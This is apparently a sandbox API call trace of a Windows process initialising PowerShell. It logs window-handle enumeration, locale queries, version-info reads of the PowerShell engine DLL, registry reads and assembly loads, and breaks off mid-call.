GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x568 [0041.368] GetLastError () returned 0x0 [0041.368] GetWindowThreadProcessId (in: hWnd=0x2004a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x568 [0041.368] GetLastError () returned 0x0 [0041.369] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x504 [0041.369] GetLastError () returned 0x0 [0041.369] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x554 [0041.369] GetLastError () returned 0x0 [0041.369] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x7e0 [0041.369] GetLastError () returned 0x0 [0041.369] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x568 [0041.369] GetLastError () returned 0x0 [0041.369] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x73c [0041.369] GetLastError () returned 0x0 [0041.369] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.369] GetLastError () returned 0x0 [0041.369] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x598 [0041.369] GetLastError () returned 0x0 [0041.369] GetWindowThreadProcessId (in: hWnd=0x20110, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0xa70 [0041.369] GetLastError () returned 0x0 [0041.369] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x880 [0041.369] GetLastError () returned 0x0 [0041.369] GetWindowThreadProcessId (in: hWnd=0x50126, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0xa40 [0041.369] GetLastError () returned 0x0 [0041.370] GetWindowThreadProcessId (in: hWnd=0x201be, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0xa40 [0041.370] GetLastError () returned 0x0 [0041.370] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x870 [0041.370] GetLastError () returned 0x0 [0041.370] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x860 [0041.370] GetLastError () returned 0x0 [0041.370] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x850 [0041.370] GetLastError () returned 0x0 [0041.370] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x840 [0041.370] GetLastError () returned 0x0 [0041.370] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x830 [0041.370] GetLastError () returned 0x0 [0041.370] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x820 [0041.370] GetLastError () returned 0x0 [0041.370] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x810 [0041.370] GetLastError () returned 0x0 [0041.370] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x710 [0041.370] GetLastError () returned 0x0 [0041.371] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x5b8 [0041.371] GetLastError () returned 0x0 [0041.371] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x688 [0041.371] GetLastError () returned 0x0 [0041.371] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x668 [0041.371] GetLastError () returned 0x0 [0041.371] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x664 [0041.371] GetLastError () returned 0x0 [0041.371] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x14c [0041.371] GetLastError () returned 0x0 [0041.371] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x144 [0041.371] GetLastError () returned 0x0 [0041.371] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x638 [0041.371] GetLastError () returned 0x0 [0041.371] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x6f4 [0041.371] GetLastError () returned 0x0 [0041.371] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x64 [0041.371] GetLastError () returned 0x0 [0041.371] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x320 [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x4a0 [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x6a4 [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x2015a, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x5c0 [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x718 [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x71c [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x704 [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x7f8 [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x5c8 [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x568 [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x568 [0041.372] GetLastError () returned 0x0 [0041.372] GetWindowThreadProcessId (in: hWnd=0x10046, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x504 [0041.372] GetLastError () returned 0x0 [0041.373] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0x25e4e0 | out: lpdwProcessId=0x25e4e0) returned 0x7e0 [0041.373] GetLastError () returned 0x0 [0041.373] GetLastError () returned 0x0 [0041.380] WerSetFlags () returned 0x0 [0041.412] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0041.413] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x25e8bc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x25e8b8 | out: pulNumLanguages=0x25e8bc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x25e8b8) returned 1 [0041.414] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x25e8bc, pwszLanguagesBuffer=0x2b6b784, pcchLanguagesBuffer=0x25e8b8 | out: pulNumLanguages=0x25e8bc, pwszLanguagesBuffer=0x2b6b784, pcchLanguagesBuffer=0x25e8b8) returned 1 [0041.446] GetUserDefaultLocaleName (in: lpLocaleName=0x54e2a0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0041.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.464] GetLastError () returned 0xcb [0041.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.467] GetLastError () returned 0xcb [0041.468] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.468] GetLastError () returned 0xcb [0041.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0041.488] GetLastError () returned 0xcb [0041.488] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e348, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0041.488] GetLastError () returned 0xcb [0041.488] SetErrorMode (uMode=0x1) returned 0x1 [0041.488] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x25e7c8 | out: lpFileInformation=0x25e7c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0041.488] GetLastError () returned 0xcb [0041.488] SetErrorMode (uMode=0x1) returned 0x1 [0041.488] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x25e84c | out: lpdwHandle=0x25e84c) returned 0x94c [0041.491] GetLastError () returned 0x0 [0041.491] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b6dcb4 | out: lpData=0x2b6dcb4) returned 1 [0041.492] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e818, puLen=0x25e814 | out: lplpBuffer=0x25e818*=0x2b6dd50, puLen=0x25e814) returned 1 [0041.492] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x2b6de2c, puLen=0x25e790) returned 1 [0041.492] lstrlenW (lpString="Microsoft Corporation") returned 21 [0041.492] lstrcpyW (in: lpString1=0x54e2a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0041.492] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x2b6de80, puLen=0x25e790) returned 1 [0041.492] lstrlenW (lpString="System.Management.Automation") returned 28 [0041.492] lstrcpyW (in: lpString1=0x54e2a0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0041.492] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x2b6dedc, puLen=0x25e790) returned 1 [0041.492] lstrlenW (lpString="6.1.7601.17514") returned 14 [0041.492] lstrcpyW (in: lpString1=0x54e2a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x2b6df1c, puLen=0x25e790) returned 1 [0041.493] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0041.493] lstrcpyW (in: lpString1=0x54e2a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x2b6df84, puLen=0x25e790) returned 1 [0041.493] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0041.493] lstrcpyW (in: lpString1=0x54e2a0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x2b6e020, puLen=0x25e790) returned 1 [0041.493] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0041.493] lstrcpyW (in: lpString1=0x54e2a0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x2b6e084, puLen=0x25e790) returned 1 [0041.493] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0041.493] lstrcpyW (in: lpString1=0x54e2a0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x2b6e100, puLen=0x25e790) returned 1 [0041.493] lstrlenW (lpString="6.1.7601.17514") returned 14 [0041.493] lstrcpyW (in: lpString1=0x54e2a0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x2b6dda8, puLen=0x25e790) returned 1 [0041.493] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0041.493] lstrcpyW (in: lpString1=0x54e2a0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x0, puLen=0x25e790) returned 0 [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x0, puLen=0x25e790) returned 0 [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x25e794, puLen=0x25e790 | out: lplpBuffer=0x25e794*=0x0, puLen=0x25e790) returned 0 [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e788, puLen=0x25e784 | out: lplpBuffer=0x25e788*=0x2b6dd50, puLen=0x25e784) returned 1 [0041.493] VerLanguageNameW (in: wLang=0x0, szLang=0x54e2a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0041.493] VerQueryValueW (in: pBlock=0x2b6dcb4, lpSubBlock="\\", lplpBuffer=0x25e79c, puLen=0x25e798 | out: lplpBuffer=0x25e79c*=0x2b6dcdc, puLen=0x25e798) returned 1 [0041.498] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.498] GetLastError () returned 0xcb [0041.521] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.521] GetLastError () returned 0xcb [0041.524] lstrlenW (lpString="䅁") returned 1 [0041.526] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e760 | out: phkResult=0x25e760*=0x314) returned 0x0 [0041.526] RegOpenKeyExW (in: hKey=0x314, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e764 | out: phkResult=0x25e764*=0x318) returned 0x0 [0041.526] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e798 | out: phkResult=0x25e798*=0x31c) returned 0x0 [0041.528] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e7d8, lpData=0x0, lpcbData=0x25e7d4*=0x0 | out: lpType=0x25e7d8*=0x1, lpData=0x0, lpcbData=0x25e7d4*=0x56) returned 0x0 [0041.529] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e7d8, lpData=0x54e2a0, lpcbData=0x25e7d4*=0x56 | out: lpType=0x25e7d8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e7d4*=0x56) returned 0x0 [0041.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0041.531] GetLastError () returned 0x0 [0041.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0041.532] GetLastError () returned 0x0 [0041.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0041.536] GetLastError () returned 0x0 [0041.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.586] GetLastError () returned 0xcb [0041.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0041.764] GetLastError () returned 0x2 [0041.764] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0041.764] GetLastError () returned 0x2 [0041.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.831] GetLastError () returned 0xcb [0041.831] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.831] GetLastError () returned 0xcb [0041.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.848] GetLastError () returned 0xcb [0041.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.848] GetLastError () returned 0xcb [0041.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.848] GetLastError () returned 0xcb [0041.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0041.942] GetLastError () returned 0x0 [0041.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0041.942] GetLastError () returned 0x0 [0041.953] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.953] GetLastError () returned 0xcb [0041.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0041.956] GetLastError () returned 0xcb [0041.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0041.977] GetLastError () returned 0x7e [0041.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0041.977] GetLastError () returned 0x7e [0042.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0042.250] GetLastError () returned 0x2 [0042.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0042.250] GetLastError () returned 0x2 [0042.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.286] GetLastError () returned 0x57 [0042.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0042.286] GetLastError () returned 0x57 [0042.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0042.389] GetLastError () returned 0x2 [0042.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25e2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0042.389] GetLastError () returned 0x2 [0042.470] GetFullPathNameW (in: 